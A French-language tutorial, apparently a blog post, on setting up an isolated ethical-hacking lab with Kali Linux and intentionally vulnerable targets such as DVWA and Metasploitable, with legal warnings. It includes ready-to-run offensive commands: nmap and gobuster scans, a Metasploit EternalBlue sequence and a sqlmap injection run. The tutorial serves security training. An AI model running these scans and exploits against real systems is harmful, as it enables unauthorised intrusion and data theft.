Introduction
Le hacking éthique commence par un lab personnel isolé et légal. Ce guide te montre comment construire un environnement d'attaque complet, reproductible sur ta propre machine, pour pratiquer sans aucun risque légal.
💡 Prérequis légaux : Ces techniques ne doivent être pratiquées QUE dans un lab isolé que tu contrôles. Toute attaque sur des systèmes tiers sans autorisation écrite est illégale (Loi camerounaise n°2010/012).
Architecture du lab offensif
Le lab est composé de deux réseaux isolés via VMware ou GNS3 :
- Réseau attaquant — Kali Linux (machine principale)
- Réseau cible — Machines vulnérables intentionnellement
Installation de Kali Linux
Kali Linux est la distribution de référence pour le hacking éthique. Installe-la en VM sur VMware :
# Téléchargement de l'image officielle
# https://www.kali.org/get-kali/#kali-virtual-machines
# Choisir l'image VMware 64-bit
# Une fois lancée, mise à jour complète :
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y kali-linux-everything
Machines cibles recommandées
Utilise ces machines volontairement vulnérables pour pratiquer :
- Metasploitable 2 — Machine Linux truffée de vulnérabilités classiques
- DVWA (Damn Vulnerable Web Application) — App web vulnérable
- VulnHub — Bibliothèque de VMs vulnérables par thème
- TryHackMe — Labs guidés en ligne (browser-based)
# Lancer DVWA via Docker (option la plus rapide)
docker run -d -p 80:80 vulnerables/web-dvwa
# Accès : http://localhost/
# Login : admin / password
Outils essentiels inclus dans Kali
Reconnaissance
# Scan réseau avec Nmap
nmap -sV -O -A 192.168.1.0/24
# Collecte OSINT avec theHarvester
theHarvester -d exemple.com -b google
# Enumération web avec Gobuster
gobuster dir -u http://cible.local -w /usr/share/wordlists/dirb/common.txt
Exploitation avec Metasploit
msfconsole
# Rechercher un exploit
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set LHOST 192.168.1.10
run
Tests web avec Burp Suite
# Burp Suite est pré-installé dans Kali
# Configurer le proxy Firefox : 127.0.0.1:8080
# Intercepter et modifier les requêtes HTTP/S
# Tests SQL Injection avec sqlmap
sqlmap -u "http://cible.local/page.php?id=1" --dbs
Méthodologie de pentest
Toujours suivre ces 5 phases dans l'ordre :
- 1. Reconnaissance — Collecte passive d'informations (OSINT)
- 2. Scanning — Nmap, enumération des services
- 3. Exploitation — Metasploit, exploits manuels
- 4. Post-exploitation — Persistence, pivot, exfiltration
- 5. Rapport — Documentation des vulnérabilités trouvées
Conclusion
Ce lab te donne tous les outils pour commencer le hacking éthique légalement. La prochaine étape est de pratiquer sur TryHackMe et HackTheBox pour valider tes compétences dans des environnements structurés.